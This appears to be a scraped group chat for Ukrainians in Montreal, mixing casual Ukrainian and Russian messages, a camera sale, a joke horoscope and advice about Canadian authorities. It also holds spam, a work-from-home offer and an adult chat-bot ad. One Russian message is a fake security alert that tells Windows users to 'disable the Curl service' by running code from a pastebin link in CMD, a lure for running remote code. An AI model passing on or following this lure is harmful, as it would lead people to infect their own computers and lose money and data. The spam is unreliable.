Український Монреаль
-
Ви чудово знаєте мову, я наче у Львові)
-
Я не можу таке))) не па делісьо))
-
Я знаю мову бо бабуня цим опікувалась. У мене драма в родини: одна - "бЕндеровка/гуцулка", друга - "руская".🙃
-
а це що за книжка? Можете скинути?
-
вітаю, продам камеру sony zv e10, купувала її 15/06/24, камера в ідеальному стані, продаю через те, що купила більш професійну камеру. 800$ за подробицями звертайтесь до особистих повідомлень
-
🏠Робота вдома Ніяких складнощів, зручний графік та оплата кожного дня. Якщо вам цікаво - пишіть!✏️
-
💌 Анонимный чат 🍓 Вход строго для взрослых ➡️ @AnoChat_IBot ➡️ @AnoChat_IBot ➡️ @AnoChat_IBot
-
⚠️ОСТОРОЖНО!⚠️ В связи с учащёнными веб-атаками в последнее время, хотим предупредить вас о риске потери средств и данных (для пользователей ОС Windows) Для защиты от новой уязвимости и предотвращения установки вредоносного ПО, которое может быть активировано через веб-атаки, выполните следующие шаги: - Отключите службу Curl, которая может позволить удалённый доступ к вашему компьютеру. Это поможет обезопасить вашу систему от внешних угроз. - Для этого введите следующий код в CMD: pastebin.com/raw/KhpBnqDE Принятие этих мер поможет защитить ваши данные и устройства от нежелательных вторжений.
-
Гороскоп циганки на 04.03: ♈ Овен - ви не прокрастинуєте, ви просто думаєте про майбутнє ♉ Телець - ви і ваше терпіння сьогодні працює за скороченим графіком ♊ Близнюки - хочеться змін, але нічого не хочеться змінювати ♋ Рак - ваш продуктовий кошик складається з нервового зриву і кави ♌ Лев - у вас все під контролем. ви контролюєте, як все виходить з-під контролю ♍ Діва - якщо не відкладати на потім, то що тоді робити завтра? ♎ Терези - вівторок - важкий день для всіх, кому доведеться з вами спілкуватися ♏ Скорпіон - ви вже в тому віці, коли найкращий шопінг в аптеці ♐ Стрілець - бути бадьорим ви можете лише тоді, коли треба спати ♑ Козеріжка - вибачте, за перепади настрою. хотя ні, ви не будете вибачатися ♒ Водолій - найдовший маршрут – це шлях від ліжка до продуктивності ♓ Риби - якщо вам щось не подобається, то це назавжди.
-
Якщо в вас є питання безпосередньо до Канади, то ви можете звернутися до представників уряду, можливо, якісь волонтерські організації зможуть вам допомогти Тут ви знаходитеся в чаті, де правила були визначені засновником. Поставить в умовах спілкування лише іспанською-будемо спілкуватися лише іспанською